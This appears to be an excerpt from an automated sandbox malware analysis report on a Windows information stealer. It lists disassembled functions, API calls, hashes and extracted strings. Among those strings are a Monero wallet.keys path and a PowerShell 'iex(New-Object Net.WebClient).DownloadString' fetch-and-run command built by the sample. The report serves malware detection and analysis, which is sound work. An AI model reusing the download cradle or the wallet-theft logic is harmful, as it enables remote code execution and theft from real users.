                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 82e0b9b7da80ac904fe4dfb7a4773750bf8790d4a4774ffe16511dd939bcc925
                              • Instruction ID: 24c658632f818bd3bbae4b929391b00274ce19d5f4e8668ef5a4e2099b8a4e69
                              • Opcode Fuzzy Hash: 82e0b9b7da80ac904fe4dfb7a4773750bf8790d4a4774ffe16511dd939bcc925
                              • Instruction Fuzzy Hash: F30112B5A40308FBDB00DBE4DC4EFAEB7B8EB48705F104559FA05A72D1DA749A008B95
                              Function 00A640B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00A640D5
                              • RegOpenKeyExA.ADVAPI32(80000001,0144DD60,00000000,00020119,?), ref: 00A640F4
                              • RegQueryValueExA.ADVAPI32(?,0144EEE0,00000000,00000000,00000000,000000FF), ref: 00A64118
                              • RegCloseKey.ADVAPI32(?), ref: 00A64122
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64147
                              • lstrcat.KERNEL32(?,0144EEF8), ref: 00A6415B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 232677c5a3303c14795e3967193931a21461ab573ec9aef60ea93c81746f76d5
                              • Instruction ID: 7410eba3ed4f608a1ed49691d27a34667f56cf07fb7202738bdd54b81baada07
                              • Opcode Fuzzy Hash: 232677c5a3303c14795e3967193931a21461ab573ec9aef60ea93c81746f76d5
                              • Instruction Fuzzy Hash: 824157B7D00108ABDB14EBA0DD5AFFE737DBB88300F404559B61657181FA755B888BE2
                              Function 00A599C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                              • LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 122894c0f125aede9f850ac6ea601be95662c816398f8655b99de5dc01dfc993
                              • Instruction ID: 4f5f5c2469f35ba422eb3aa13956f73955e810ce3767f657fa032fa259167f93
                              • Opcode Fuzzy Hash: 122894c0f125aede9f850ac6ea601be95662c816398f8655b99de5dc01dfc993
                              • Instruction Fuzzy Hash: 81312BB4A00209EFDB14CF94C989BEE77B5FF48341F108159E911AB290D774AA46CFA1
                              Function 00A6C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 995e4a360798d10cbb0844490a94e589097e5cbeaec8330c1ff464ccee71ccb5
                              • Instruction ID: 88cbf15b596a7cc6200b4b37ef803c6d010b119b76cb7c2d6909550c3e990407
                              • Opcode Fuzzy Hash: 995e4a360798d10cbb0844490a94e589097e5cbeaec8330c1ff464ccee71ccb5
                              • Instruction Fuzzy Hash: 0141E5B250079C5EDB328B24CD84FFBBBF8AB45714F1444E8E9CA87182E2719A45DF60
                              Function 00A64780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0144EFD0), ref: 00A647DB
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A64801
                              • lstrcat.KERNEL32(?,?), ref: 00A64820
                              • lstrcat.KERNEL32(?,?), ref: 00A64834
                              • lstrcat.KERNEL32(?,0143A7F8), ref: 00A64847
                              • lstrcat.KERNEL32(?,?), ref: 00A6485B
                              • lstrcat.KERNEL32(?,0144DFC0), ref: 00A6486F
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A68D90: GetFileAttributesA.KERNEL32(00000000,?,00A51B54,?,?,00A7564C,?,?,00A70E1F), ref: 00A68D9F
                                • Part of subcall function 00A64570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A64580
                                • Part of subcall function 00A64570: RtlAllocateHeap.NTDLL(00000000), ref: 00A64587
                                • Part of subcall function 00A64570: wsprintfA.USER32 ref: 00A645A6
                                • Part of subcall function 00A64570: FindFirstFileA.KERNEL32(?,?), ref: 00A645BD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 4a3ab082e7de580ae52370587dc7fa09d51d9e59b488d569e4c30410fdf12f1d
                              • Instruction ID: 48f1919211c1092027325db924f4e27a37e1341e4d3b1dc7c79e12aa1b09e165
                              • Opcode Fuzzy Hash: 4a3ab082e7de580ae52370587dc7fa09d51d9e59b488d569e4c30410fdf12f1d
                              • Instruction Fuzzy Hash: 77315EB2900218A7CB14FBB0DD89FED737CAB58700F444589B71996081EE7496898B95
                              Function 00A62C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A62D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A62CC4
                              • ')", xrefs: 00A62CB3
                              • <, xrefs: 00A62D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A62D04
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: fac38b9f0f5b53be8c83f3f1fea1b0a3cf4513b1fa8f11e4be70c8831077a542
                              • Instruction ID: 53362794a569e61527bbe32459047301080737b74a62c5d965929dd38202eea2
                              • Opcode Fuzzy Hash: fac38b9f0f5b53be8c83f3f1fea1b0a3cf4513b1fa8f11e4be70c8831077a542
                              • Instruction Fuzzy Hash: C7419D71D102089ADB14FFA0CE96FEDBB78AF24300F508529E516B7191DF746A4ACF92
                              Function 00A59E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A59F41
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 31a113dd4527d0e319448f4bc513a607507204165eeb6def9a1f804d1efa1423
                              • Instruction ID: 4d199b0bd287a0d2efdef9d42c6557c9cba27d0d1b6ffcce62450ffb6d82adcf
                              • Opcode Fuzzy Hash: 31a113dd4527d0e319448f4bc513a607507204165eeb6def9a1f804d1efa1423
                              • Instruction Fuzzy Hash: FE612D71A10248EBDB24EFA4CD96FED7775BF64340F008518F90AAF191EB706A09CB91
                              Function 00A66920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 00A6696C
                              • sscanf.NTDLL ref: 00A66999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A669B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A669C0
                              • ExitProcess.KERNEL32 ref: 00A669DA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: a7d5dd9fcae7b3926d837d950a0115e8b1d9ce4a9dd17a30d3cf41eeaaad6ca9
                              • Instruction ID: 8a783ddd4ab5933edeeb486824e05042b6ada9cea34850fb5403380238d8083d
                              • Opcode Fuzzy Hash: a7d5dd9fcae7b3926d837d950a0115e8b1d9ce4a9dd17a30d3cf41eeaaad6ca9
                              • Instruction Fuzzy Hash: 9E21AB75D14209ABCF04EFE4D949AEEB7B9BF48300F04852AE516E3250EB345605CBA9
                              Function 00A67E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0143B868,00000000,00020119,?), ref: 00A67E5E
                              • RegQueryValueExA.ADVAPI32(?,0144DE60,00000000,00000000,000000FF,000000FF), ref: 00A67E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00A67E92
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: dae0c8d410b7e24519a3678aa95a5470e9dfa558df93e9b4d3c47bd3cb61704d
                              • Instruction ID: 2c01ec891e05bf943cf0e41737c2f9c7b68c29fa935e8191e454b3d59604aa93
                              • Opcode Fuzzy Hash: dae0c8d410b7e24519a3678aa95a5470e9dfa558df93e9b4d3c47bd3cb61704d
                              • Instruction Fuzzy Hash: 27114CB1A44205EBD700CF95DD4AFBFBBB8EB44B14F10415AFA05A7280D77558048BE1
                              Function 00A69260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(0144ECA0,?,?,?,00A6140C,?,0144ECA0,00000000), ref: 00A6926C
                              • lstrcpyn.KERNEL32(00C9AB88,0144ECA0,0144ECA0,?,00A6140C,?,0144ECA0), ref: 00A69290
                              • lstrlen.KERNEL32(?,?,00A6140C,?,0144ECA0), ref: 00A692A7
                              • wsprintfA.USER32 ref: 00A692C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 615344f2b5174a539151dc5af01f7315415d38cbdf0806839e13251de5b9b9c8
                              • Instruction ID: 2ca6d318b4eb49c5c2b411b0252683a9b86c40da030103b585852de89088c3e0
                              • Opcode Fuzzy Hash: 615344f2b5174a539151dc5af01f7315415d38cbdf0806839e13251de5b9b9c8
                              • Instruction Fuzzy Hash: 4B01DA75500208FFCB08DFECC999EAE7BB9EB48354F108588F9099B244C631AA50DBD2
                              Function 00A512A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A512B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A512BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A512D7
